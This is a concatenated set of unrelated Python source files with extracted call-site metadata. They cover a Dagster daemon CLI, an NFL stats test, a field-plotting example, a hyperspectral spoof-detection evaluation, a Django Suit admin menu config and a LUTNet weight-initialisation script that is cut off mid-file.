    "Daemon debugging utils"


def create_dagster_daemon_cli():
    commands = {
        "run": run_command,
        "health-check": health_check_command,
        "liveness-check": liveness_check_command,
        "wipe": wipe_command,
        "debug": debug_group,
    }

    @click.group(commands=commands)
    @click.version_option(version=__version__)
    def group():
        "CLI tools for working with the dagster daemon process."

    return group


cli = create_dagster_daemon_cli()


def main():
    cli(obj={})  # pylint:disable=E1123
[((31, 1, 34, 1), 'click.command', 'click.command', (), '', False, 'import click\n'), ((51, 1, 54, 1), 'click.command', 'click.command', (), '', False, 'import click\n'), ((65, 1, 68, 1), 'click.command', 'click.command', (), '', False, 'import click\n'), ((69, 1, 74, 1), 'click.option', 'click.option', (), '', False, 'import click\n'), ((84, 1, 87, 1), 'click.command', 'click.command', (), '', False, 'import click\n'), ((94, 1, 97, 1), 'click.command', 'click.command', (), '', False, 'import click\n'), ((103, 1, 106, 1), 'click.command', 'click.command', (), '', False, 'import click\n'), ((113, 1, 115, 1), 'click.group', 'click.group', (), '', False, 'import click\n'), ((25, 16, 27, 5), 'os.getenv', 'os.getenv', ({(26, 8, 26, 44): '"""DAGSTER_DAEMON_HEARTBEAT_TOLERANCE"""'}, {}), "('DAGSTER_DAEMON_HEARTBEAT_TOLERANCE')", False, 'import os\n'), ((56, 4, 56, 76), 'warnings.warn', 'warnings.warn', ({(56, 18, 56, 75): '"""health-check is deprecated. Use liveness-check instead."""'}, {}), "('health-check is deprecated. Use liveness-check instead.')", False, 'import warnings\n'), ((129, 5, 129, 35), 'click.group', 'click.group', (), '', False, 'import click\n'), ((130, 5, 130, 46), 'click.version_option', 'click.version_option', (), '', False, 'import click\n'), ((36, 9, 36, 29), 'dagster.utils.interrupts.capture_interrupts', 'capture_interrupts', ({}, {}), '()', False, 'from dagster.utils.interrupts import capture_interrupts, raise_interrupts_as\n'), ((57, 9, 57, 30), 'dagster.core.instance.DagsterInstance.get', 'DagsterInstance.get', ({}, {}), '()', False, 'from dagster.core.instance import DagsterInstance\n'), ((76, 9, 76, 30), 'dagster.core.instance.DagsterInstance.get', 'DagsterInstance.get', ({}, {}), '()', False, 'from dagster.core.instance import DagsterInstance\n'), ((89, 9, 89, 30), 'dagster.core.instance.DagsterInstance.get', 'DagsterInstance.get', ({}, {}), '()', False, 'from dagster.core.instance import DagsterInstance\n'), ((91, 8, 91, 45), 'click.echo', 'click.echo', ({(91, 19, 91, 44): '"""Daemon heartbeats wiped"""'}, {}), "('Daemon heartbeats wiped')", False, 'import click\n'), ((99, 9, 99, 30), 'dagster.core.instance.DagsterInstance.get', 'DagsterInstance.get', ({}, {}), '()', False, 'from dagster.core.instance import DagsterInstance\n'), ((100, 8, 100, 41), 'dagster.daemon.controller.debug_daemon_heartbeats', 'debug_daemon_heartbeats', ({(100, 32, 100, 40): 'instance'}, {}), '(instance)', False, 'from dagster.daemon.controller import DEFAULT_DAEMON_HEARTBEAT_TOLERANCE_SECONDS, DagsterDaemonController, all_daemons_healthy, all_daemons_live, daemon_controller_from_instance, debug_daemon_heartbeats, get_daemon_status\n'), ((108, 9, 108, 30), 'dagster.core.instance.DagsterInstance.get', 'DagsterInstance.get', ({}, {}), '()', False, 'from dagster.core.instance import DagsterInstance\n'), ((37, 13, 37, 34), 'dagster.core.instance.DagsterInstance.get', 'DagsterInstance.get', ({}, {}), '()', False, 'from dagster.core.instance import DagsterInstance\n'), ((59, 12, 59, 40), 'click.echo', 'click.echo', ({(59, 23, 59, 39): '"""Daemon healthy"""'}, {}), "('Daemon healthy')", False, 'import click\n'), ((61, 12, 61, 44), 'click.echo', 'click.echo', ({(61, 23, 61, 43): '"""Daemon not healthy"""'}, {}), "('Daemon not healthy')", False, 'import click\n'), ((62, 12, 62, 23), 'sys.exit', 'sys.exit', ({(62, 21, 62, 22): '(1)'}, {}), '(1)', False, 'import sys\n'), ((78, 12, 78, 37), 'click.echo', 'click.echo', ({(78, 23, 78, 36): '"""Daemon live"""'}, {}), "('Daemon live')", False, 'import 
click\n'), ((80, 12, 80, 47), 'click.echo', 'click.echo', ({(80, 23, 80, 46): '"""Daemon(s) not running"""'}, {}), "('Daemon(s) not running')", False, 'import click\n'), ((81, 12, 81, 23), 'sys.exit', 'sys.exit', ({(81, 21, 81, 22): '(1)'}, {}), '(1)', False, 'import sys\n'), ((110, 23, 110, 63), 'dagster.daemon.controller.get_daemon_status', 'get_daemon_status', ({(110, 41, 110, 49): 'instance', (110, 51, 110, 62): 'daemon_type'}, {}), '(instance, daemon_type)', False, 'from dagster.daemon.controller import DEFAULT_DAEMON_HEARTBEAT_TOLERANCE_SECONDS, DagsterDaemonController, all_daemons_healthy, all_daemons_live, daemon_controller_from_instance, debug_daemon_heartbeats, get_daemon_status\n')]
atklaus/sportsreference
tests/exhaustive/nfl_tests.py
22a45ea83ce1608c3176f00d4f414d5b9463605c
import sys, os
sys.path.append(os.path.dirname(os.path.dirname(sys.path[0])))

from sportsreference.nfl.teams import Teams

for team in Teams():
    print(team.name)
    for player in team.roster.players:
        print(player.name)
    for game in team.schedule:
        print(game.dataframe)
        print(game.dataframe_extended)
[((5, 12, 5, 19), 'sportsreference.nfl.teams.Teams', 'Teams', ({}, {}), '()', False, 'from sportsreference.nfl.teams import Teams\n'), ((2, 32, 2, 60), 'os.path.dirname', 'os.path.dirname', ({(2, 48, 2, 59): 'sys.path[0]'}, {}), '(sys.path[0])', False, 'import sys, os\n')]
SerebryakovMA/quelea
rust-old/python/examples/map_fields.py
4bac70d60852a454ad6533d08a02e018c75dc377
import numpy as np
import matplotlib
import matplotlib.pyplot as plt

import sys
sys.path.append("../")
from quelea import *

nx = 217
ny = 133
x0 = 0
x1 = 30 # lambdas
y0 = 0
y1 = 20 # lambdas

xs = np.linspace(x0, x1, nx)
ys = np.linspace(y0, y1, ny)

# 2d array of (x, y, z, t)
coords = np.array( [ [x, y, 0, 0] for x in xs for y in ys ] )
# for map_fields function this should be converted from 2D to 1D array
coords = coords.reshape((4 * nx * ny,))

ftype = 1 # plane wave
a0 = 1 # normalized field amplitude
omega = 1 # frequency
fparam = [a0, 1, 0, 0, 0, 1, 0, 0, omega] # parameters of the plane wave

ex, ey, ez, bx, by, bz = map_fields(coords, ftype, fparam)

# now convert to 2d arrays
ex = ex.reshape((nx, ny))
ey = ey.reshape((nx, ny))
ez = ez.reshape((nx, ny))
bx = bx.reshape((nx, ny))
by = by.reshape((nx, ny))
bz = bz.reshape((nx, ny))

ex = ex.transpose()
ey = ey.transpose()
ez = ez.transpose()
bx = bx.transpose()
by = by.transpose()
bz = bz.transpose()

plt.imshow(ey, cmap = 'RdYlBu', origin = 'lower', extent = [x0, x1, y0, y1])
plt.colorbar()
plt.clim(-a0, a0)

plt.savefig("map_fields.pdf")
[((6, 0, 6, 22), 'sys.path.append', 'sys.path.append', ({(6, 16, 6, 21): '"""../"""'}, {}), "('../')", False, 'import sys\n'), ((17, 5, 17, 28), 'numpy.linspace', 'np.linspace', ({(17, 17, 17, 19): 'x0', (17, 21, 17, 23): 'x1', (17, 25, 17, 27): 'nx'}, {}), '(x0, x1, nx)', True, 'import numpy as np\n'), ((18, 5, 18, 28), 'numpy.linspace', 'np.linspace', ({(18, 17, 18, 19): 'y0', (18, 21, 18, 23): 'y1', (18, 25, 18, 27): 'ny'}, {}), '(y0, y1, ny)', True, 'import numpy as np\n'), ((21, 9, 21, 61), 'numpy.array', 'np.array', ({(21, 19, 21, 59): '[[x, y, 0, 0] for x in xs for y in ys]'}, {}), '([[x, y, 0, 0] for x in xs for y in ys])', True, 'import numpy as np\n'), ((45, 0, 45, 76), 'matplotlib.pyplot.imshow', 'plt.imshow', (), '', True, 'import matplotlib.pyplot as plt\n'), ((46, 0, 46, 14), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((47, 0, 47, 17), 'matplotlib.pyplot.clim', 'plt.clim', ({(47, 9, 47, 12): '(-a0)', (47, 14, 47, 16): 'a0'}, {}), '(-a0, a0)', True, 'import matplotlib.pyplot as plt\n'), ((49, 0, 49, 29), 'matplotlib.pyplot.savefig', 'plt.savefig', ({(49, 12, 49, 28): '"""map_fields.pdf"""'}, {}), "('map_fields.pdf')", True, 'import matplotlib.pyplot as plt\n')]
t-kaichi/hyperspoof
test.py
6effdf03be8489ba74154a12416c69948681aa51
import os
from absl import app
from absl import flags
import numpy as np
import tqdm
from tensorflow.keras import Model
from albumentations import (
    Compose, HorizontalFlip, RandomBrightness,RandomContrast,
    ShiftScaleRotate, ToFloat, VerticalFlip)

from utils import reset_tf
from eval_utils import calc_score_variance
from models import build_seg_model, build_pixel_mlp_class_model
from VegetableSequence import VegetableDataset, VegetableSequence
from temporal_random_seed import TemporalRandomSeed
import myFlags

FLAGS = flags.FLAGS


def main(argv):
    reset_tf(FLAGS.device)
    ds_info = VegetableDataset(FLAGS.data_path)
    dim = ds_info.hsi_dims
    cats = ds_info.get_categories()

    # spoof file path
    assert FLAGS.spoof_type == "print" or FLAGS.spoof_type == "replay"
    spooffn = "224_224.m.rf.npy"
    spoofdir = '03' if FLAGS.spoof_type == 'print' else '04'  # "04": replay
    spooffns = [os.path.join(ds_info.DATASET_ROOT_PATH, str(i).zfill(2),
                             "05", spoofdir, spooffn) for i in cats]

    # dataset generation
    input_shape = (224, 224, dim)
    AUGMENTATIONS_ALL = Compose([
        HorizontalFlip(p=0.5),
        VerticalFlip(p=0.2),
        RandomContrast(limit=0.001, p=0.5),
        RandomBrightness(limit=0.001, p=0.5),
        ShiftScaleRotate(
            shift_limit=0.3, scale_limit=0.9,
            rotate_limit=30, border_mode=4, p=0.8),# cv2.BORDER_REFLECT_101
        ToFloat(max_value=1024)
    ])
    AUGMENTATIONS_SIMPLE = Compose([
        ToFloat(max_value=1024)
    ])

    test_aug_gen = VegetableSequence(dataset=ds_info, instance_ids=[5],
                                     sample_ids=[1,2], random_state=2,
                                     batch_size=32, augmentations=AUGMENTATIONS_ALL, isTest=True)

    # build and load models
    print("building model")
    nb_classes = ds_info.object_categories
    seg_model = build_seg_model(input_shape=input_shape)
    seg_model.load_weights(FLAGS.seg_model)

    pix_class_model = build_pixel_mlp_class_model(
        nb_classes=nb_classes, input_shape=(1,dim))
    pix_class_model.load_weights(FLAGS.class_model)

    penultimate_feat_extractor = Model(inputs=pix_class_model.input,
                                       outputs=pix_class_model.get_layer("penultimate").output)

    def predict_pixel_merge(xs):
        _xs_seg = np.argmax(seg_model.predict(xs), axis=-1)
        assert len(_xs_seg) == len(xs)
        _var_fs = []  # variance of the penultimate features
        for i in range(len(xs)):
            _x = xs[i]
            _x_seg = _xs_seg[i]
            _x_pixels = _x[_x_seg > 0]
            _x_pixels = _x_pixels[:, np.newaxis, :]
            _f_pixels = penultimate_feat_extractor.predict(
                _x_pixels, batch_size=224*224*dim).reshape(-1, FLAGS.penultimate_nodes)
            _var_f = np.sum(np.var(_f_pixels, axis=0))
            _var_fs.append(_var_f)
        return _var_fs

    predict_func = predict_pixel_merge

    var_fs = []
    true_labels = []

    # process live images
    for i in tqdm.trange(FLAGS.live_augs, desc="live augumentations"):
        for batch in tqdm.tqdm(test_aug_gen, desc="live augumentations batch"):
            xs, ys = batch
            var_f = predict_func(xs)
            var_fs.extend(var_f)
            true_labels.extend(np.argmax(ys, axis=1))

    # process spoof images
    with TemporalRandomSeed(2021):
        for fn in tqdm.tqdm(spooffns, desc="spoofs"):
            x = np.load(fn).astype("uint16")
            xs_aug = np.array([AUGMENTATIONS_ALL(image=x)["image"]
                               for i in range(FLAGS.spoof_augs)])
            var_f = predict_func(xs_aug)
            var_fs.extend(var_f)
            true_labels.extend([10000] * FLAGS.spoof_augs)  # spoof label: 10000

    # calculate accuracy
    true_labels = np.array(true_labels)
    var_fs = np.array(var_fs)
    bin_labels, uncertainties, results = calc_score_variance(true_labels, var_fs)

    # save results
    expr_name = parentdirname(FLAGS.class_model)
    save_result_cache(expr_name, bin_labels, uncertainties, results)
    return 0


def save_result_cache(expr_name, labels, uncertainties, results):
    dn = os.path.join(FLAGS.out_path, expr_name)
    os.makedirs(dn, exist_ok=True)
    np.save(os.path.join(dn, "binary_labels.npy"), labels)
    np.save(os.path.join(dn, "uncertainties.npy"), uncertainties)
    with open(os.path.join(dn, "results.txt"), "w") as f:
        for i, result in enumerate(["TNR95: ", "Detection acc.: ", "ROC: "]):
            f.write(result + str(results[i]) + "\n")
    print("saved to " + dn)


def parentdirname(path):
    return os.path.basename(os.path.dirname(path))


if __name__ == "__main__":
    app.run(main)
[((21, 4, 21, 26), 'utils.reset_tf', 'reset_tf', ({(21, 13, 21, 25): 'FLAGS.device'}, {}), '(FLAGS.device)', False, 'from utils import reset_tf\n'), ((22, 14, 22, 47), 'VegetableSequence.VegetableDataset', 'VegetableDataset', ({(22, 31, 22, 46): 'FLAGS.data_path'}, {}), '(FLAGS.data_path)', False, 'from VegetableSequence import VegetableDataset, VegetableSequence\n'), ((48, 19, 50, 69), 'VegetableSequence.VegetableSequence', 'VegetableSequence', (), '', False, 'from VegetableSequence import VegetableDataset, VegetableSequence\n'), ((55, 16, 55, 56), 'models.build_seg_model', 'build_seg_model', (), '', False, 'from models import build_seg_model, build_pixel_mlp_class_model\n'), ((58, 22, 59, 59), 'models.build_pixel_mlp_class_model', 'build_pixel_mlp_class_model', (), '', False, 'from models import build_seg_model, build_pixel_mlp_class_model\n'), ((87, 13, 87, 69), 'tqdm.trange', 'tqdm.trange', (), '', False, 'import tqdm\n'), ((105, 18, 105, 39), 'numpy.array', 'np.array', ({(105, 27, 105, 38): 'true_labels'}, {}), '(true_labels)', True, 'import numpy as np\n'), ((107, 13, 107, 29), 'numpy.array', 'np.array', ({(107, 22, 107, 28): 'var_fs'}, {}), '(var_fs)', True, 'import numpy as np\n'), ((108, 41, 108, 81), 'eval_utils.calc_score_variance', 'calc_score_variance', ({(108, 61, 108, 72): 'true_labels', (108, 74, 108, 80): 'var_fs'}, {}), '(true_labels, var_fs)', False, 'from eval_utils import calc_score_variance\n'), ((116, 9, 116, 48), 'os.path.join', 'os.path.join', ({(116, 22, 116, 36): 'FLAGS.out_path', (116, 38, 116, 47): 'expr_name'}, {}), '(FLAGS.out_path, expr_name)', False, 'import os\n'), ((117, 4, 117, 34), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((129, 4, 129, 17), 'absl.app.run', 'app.run', ({(129, 12, 129, 16): 'main'}, {}), '(main)', False, 'from absl import app\n'), ((88, 21, 88, 78), 'tqdm.tqdm', 'tqdm.tqdm', (), '', False, 'import tqdm\n'), ((95, 9, 95, 33), 'temporal_random_seed.TemporalRandomSeed', 'TemporalRandomSeed', ({(95, 28, 95, 32): '(2021)'}, {}), '(2021)', False, 'from temporal_random_seed import TemporalRandomSeed\n'), ((96, 18, 96, 52), 'tqdm.tqdm', 'tqdm.tqdm', (), '', False, 'import tqdm\n'), ((118, 12, 118, 49), 'os.path.join', 'os.path.join', ({(118, 25, 118, 27): 'dn', (118, 29, 118, 48): '"""binary_labels.npy"""'}, {}), "(dn, 'binary_labels.npy')", False, 'import os\n'), ((119, 12, 119, 49), 'os.path.join', 'os.path.join', ({(119, 25, 119, 27): 'dn', (119, 29, 119, 48): '"""uncertainties.npy"""'}, {}), "(dn, 'uncertainties.npy')", False, 'import os\n'), ((126, 28, 126, 49), 'os.path.dirname', 'os.path.dirname', ({(126, 44, 126, 48): 'path'}, {}), '(path)', False, 'import os\n'), ((36, 8, 36, 29), 'albumentations.HorizontalFlip', 'HorizontalFlip', (), '', False, 'from albumentations import Compose, HorizontalFlip, RandomBrightness, RandomContrast, ShiftScaleRotate, ToFloat, VerticalFlip\n'), ((37, 8, 37, 27), 'albumentations.VerticalFlip', 'VerticalFlip', (), '', False, 'from albumentations import Compose, HorizontalFlip, RandomBrightness, RandomContrast, ShiftScaleRotate, ToFloat, VerticalFlip\n'), ((38, 8, 38, 42), 'albumentations.RandomContrast', 'RandomContrast', (), '', False, 'from albumentations import Compose, HorizontalFlip, RandomBrightness, RandomContrast, ShiftScaleRotate, ToFloat, VerticalFlip\n'), ((39, 8, 39, 44), 'albumentations.RandomBrightness', 'RandomBrightness', (), '', False, 'from albumentations import Compose, HorizontalFlip, RandomBrightness, RandomContrast, ShiftScaleRotate, ToFloat, VerticalFlip\n'), ((40, 
8, 42, 50), 'albumentations.ShiftScaleRotate', 'ShiftScaleRotate', (), '', False, 'from albumentations import Compose, HorizontalFlip, RandomBrightness, RandomContrast, ShiftScaleRotate, ToFloat, VerticalFlip\n'), ((43, 8, 43, 31), 'albumentations.ToFloat', 'ToFloat', (), '', False, 'from albumentations import Compose, HorizontalFlip, RandomBrightness, RandomContrast, ShiftScaleRotate, ToFloat, VerticalFlip\n'), ((46, 8, 46, 31), 'albumentations.ToFloat', 'ToFloat', (), '', False, 'from albumentations import Compose, HorizontalFlip, RandomBrightness, RandomContrast, ShiftScaleRotate, ToFloat, VerticalFlip\n'), ((120, 14, 120, 45), 'os.path.join', 'os.path.join', ({(120, 27, 120, 29): 'dn', (120, 31, 120, 44): '"""results.txt"""'}, {}), "(dn, 'results.txt')", False, 'import os\n'), ((78, 28, 78, 53), 'numpy.var', 'np.var', (), '', True, 'import numpy as np\n'), ((92, 31, 92, 52), 'numpy.argmax', 'np.argmax', (), '', True, 'import numpy as np\n'), ((97, 16, 97, 27), 'numpy.load', 'np.load', ({(97, 24, 97, 26): 'fn'}, {}), '(fn)', True, 'import numpy as np\n')]
TheJacksonLaboratory/jaxid_generator
generator/apps.py
be5222d9c5ce57a169b94b0afd1ae9f7f10a66c1
from django.conf import settings
from suit import apps
from suit.apps import DjangoSuitConfig
from suit.menu import ParentItem, ChildItem

APP_NAME = settings.APP_NAME
WIKI_URL = settings.WIKI_URL


class SuitConfig(DjangoSuitConfig):
    name = 'suit'
    verbose_name = 'Mbiome Core JAXid Generator'
    site_title = 'Mbiome Core JAXid Tracking'
    site_header = site_title
    index_title = verbose_name

    layout = 'vertical'
    list_per_page = 35

    # header_date_format = 'l, d-M-o'
    # header_time_format = 'H:i e'

    menu = (
            ParentItem('JAX Id Record Lists',
                use_first_child_url=True,
                url='',
                children=[
                    ChildItem('JAXid Records', model='id_generate.jaxiddetail'),
                    ChildItem(model='id_generate.boxid'),
                    ChildItem(model='id_generate.plateid'),
                    ],
                icon='fa fa-list-ul'),
            ParentItem('Reference Data',
                use_first_child_url=True,
                url='',
                children=[
                    ChildItem(model='id_generate.projectcode'),
                    ChildItem(model='id_generate.nucleicacidtype'),
                    ChildItem(model='id_generate.sampletype'),
                    ChildItem(model='id_generate.sequencingtype'),
                    ],
                icon='fa fa-list'),
            ParentItem(
                label='Generate new JAXid''s',
                url=f'/{APP_NAME}/manage/id_generate/jaxiddetail/import/',
                permissions='id_generate.change_jaxiddetail',
                icon='fa fa-rocket'),
            ParentItem(
                label='Generate new Box ID''s',
                url=f'/{APP_NAME}/manage/id_generate/boxid/import/',
                permissions='id_generate.change_boxid',
                icon='fa fa-cube'),
            ParentItem(
                label='Generate new Plate ID''s',
                url=f'/{APP_NAME}/manage/id_generate/plateid/import/',
                permissions='id_generate.change_plateid',
                icon='fa fa-circle-o-notch'),
            ParentItem(
                label='Authorization',
                children=[
                    ChildItem('Staff', model='auth.user'),
                    ChildItem(model='auth.group'),
                    ChildItem(model='admin.logentry'),
                    ],
                icon='fa fa-user-circle'),

            ParentItem(
                label='SOP and Request Sheet',
                use_first_child_url=False,
                url='',
                children=[
                    ChildItem('View JAX ID Request SOP',
                        target_blank=True,
                        url=f'{WIKI_URL}/Wet%20Lab%20SOPs/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FWet%20Lab%20SOPs%2FJAX%20ID%20Request%20SOP%2Edocx'),
                    ChildItem('View JAX ID Request Template Sheet',
                        url=f'{WIKI_URL}/Sample Sheet Templates/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FSample Sheet Templates%2FJAX ID Request Template Sample Sheet.xlsx'),
                    ],
                icon='fa fa-file'),
            )

    # menu_handler = None
    menu_show_home = False

    # Show changelist top actions only if any row is selected
    toggle_changelist_top_actions = False
    #
    # Enables two column layout for change forms with submit row on the right
    form_submit_on_right = False

    # Hide name/"original" column for all tabular inlines.
    # May be overridden in Inline class by suit_form_inlines_hide_original = False
    #form_inlines_hide_original = False

    form_size = {
        'default': apps.SUIT_FORM_SIZE_LARGE,
        'widgets': {
            'AutosizedTextarea': apps.SUIT_FORM_SIZE_X_LARGE,
            'Textarea': apps.SUIT_FORM_SIZE_X_LARGE,
        },
    }

    # form_size setting can be overridden in ModelAdmin using suit_form_size parameter
    #
    # Example:
    # ----------------------------------------------
    # suit_form_size = {
    #     'default': 'col-xs-12 col-sm-2', 'col-xs-12 col-sm-10',
    #     'fields': {
    #         'field_name': SUIT_FORM_SIZE_LARGE,
    #         'field_name2': SUIT_FORM_SIZE_X_LARGE,
    #     },
    #     'widgets': {
    #         'widget_class_name': SUIT_FORM_SIZE_FULL,
    #         'AdminTextareaWidget': SUIT_FORM_SIZE_FULL,
    #     },
    #     'fieldsets': {
    #         'fieldset_name': SUIT_FORM_SIZE_FULL,
    #         'fieldset_name2': SUIT_FORM_SIZE_FULL,
    #     }
    # }
[((43, 12, 47, 36), 'suit.menu.ParentItem', 'ParentItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n'), ((48, 12, 52, 34), 'suit.menu.ParentItem', 'ParentItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n'), ((53, 12, 57, 44), 'suit.menu.ParentItem', 'ParentItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n'), ((28, 20, 28, 79), 'suit.menu.ChildItem', 'ChildItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n'), ((29, 20, 29, 56), 'suit.menu.ChildItem', 'ChildItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n'), ((30, 20, 30, 58), 'suit.menu.ChildItem', 'ChildItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n'), ((37, 20, 37, 62), 'suit.menu.ChildItem', 'ChildItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n'), ((38, 20, 38, 66), 'suit.menu.ChildItem', 'ChildItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n'), ((39, 20, 39, 61), 'suit.menu.ChildItem', 'ChildItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n'), ((40, 20, 40, 65), 'suit.menu.ChildItem', 'ChildItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n'), ((61, 20, 61, 57), 'suit.menu.ChildItem', 'ChildItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n'), ((62, 20, 62, 49), 'suit.menu.ChildItem', 'ChildItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n'), ((63, 20, 63, 53), 'suit.menu.ChildItem', 'ChildItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n'), ((72, 20, 74, 175), 'suit.menu.ChildItem', 'ChildItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n'), ((75, 20, 76, 197), 'suit.menu.ChildItem', 'ChildItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n')]
awai54st/LUTNet
tiled-lutnet/training-software/MNIST-CIFAR-SVHN/models/MNIST/scripts/lutnet_init.py
81b044f31d1131bee1a7fae41fc4d2fb102ea73a
import h5py import numpy as np np.set_printoptions(threshold=np.nan) from shutil import copyfile copyfile("dummy_lutnet.h5", "pretrained_bin.h5") # create pretrained.h5 using datastructure from dummy.h5 bl = h5py.File("baseline_pruned.h5", 'r') #dummy = h5py.File("dummy.h5", 'r') pretrained = h5py.File("pretrained_bin.h5", 'r+') # dense layer 1 bl_w1 = bl["model_weights"]["binary_dense_1"]["binary_dense_1"]["Variable_1:0"] bl_pruning_mask = bl["model_weights"]["binary_dense_1"]["binary_dense_1"]["pruning_mask:0"] bl_gamma = bl["model_weights"]["binary_dense_1"]["binary_dense_1"]["Variable:0"] zero_fill = np.zeros(np.shape(np.array(bl_w1))) pret_w1 = pretrained["model_weights"]["binary_dense_1"]["binary_dense_1"]["Variable_1:0"] pret_pruning_mask = pretrained["model_weights"]["binary_dense_1"]["binary_dense_1"]["pruning_mask:0"] p_gamma = pretrained["model_weights"]["binary_dense_1"]["binary_dense_1"]["Variable:0"] pret_w1[...] = np.array(bl_w1) p_gamma[...] = np.array(bl_gamma) pret_pruning_mask[...] = np.array(bl_pruning_mask) print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask)))) # dense layer 2 bl_w1 = bl["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_1:0"] bl_rand_map_0 = bl["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_0:0"] bl_pruning_mask = bl["model_weights"]["binary_dense_2"]["binary_dense_2"]["pruning_mask:0"] bl_gamma = bl["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable:0"] bl_means = bl["model_weights"]["residual_sign_1"]["residual_sign_1"]["means:0"] pret_rand_map_0 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_0:0"] pret_rand_map_1 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_1:0"] pret_rand_map_2 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_2:0"] pret_pruning_mask = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["pruning_mask:0"] p_gamma = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable:0"] pret_means = pretrained["model_weights"]["residual_sign_1"]["residual_sign_1"]["means:0"] pret_c1 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_1:0"] pret_c2 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_2:0"] pret_c3 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_3:0"] pret_c4 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_4:0"] pret_c5 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_5:0"] pret_c6 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_6:0"] pret_c7 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_7:0"] pret_c8 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_8:0"] pret_c9 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_9:0"] pret_c10= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_10:0"] pret_c11= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_11:0"] pret_c12= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_12:0"] pret_c13= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_13:0"] pret_c14= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_14:0"] pret_c15= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_15:0"] pret_c16= 
pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_16:0"] pret_c17= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_17:0"] pret_c18= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_18:0"] pret_c19= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_19:0"] pret_c20= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_20:0"] pret_c21= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_21:0"] pret_c22= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_22:0"] pret_c23= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_23:0"] pret_c24= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_24:0"] pret_c25= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_25:0"] pret_c26= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_26:0"] pret_c27= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_27:0"] pret_c28= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_28:0"] pret_c29= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_29:0"] pret_c30= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_30:0"] pret_c31= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_31:0"] pret_c32= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_32:0"] pret_w1 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_33:0"] pret_rand_map_exp_0 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_exp_0:0"] pret_rand_map_exp_1 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_exp_1:0"] pret_rand_map_exp_2 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_exp_2:0"] weight_shape = np.shape(bl_w1) tile_shape = np.shape(pret_c1) zero_fill = np.zeros(tile_shape) one_fill = np.ones(tile_shape) neg_one_fill = -np.ones(tile_shape) # randomisation and pruning recovery bl_w1_unroll = np.array(bl_w1) bl_w1 = np.array(bl_w1) rand_map_0 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_0) rand_map_1 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_1) rand_map_2 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_2) pruning_mask = np.array(bl_pruning_mask).astype(bool) init_mask = np.logical_not(pruning_mask[rand_map_0]) pruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)] 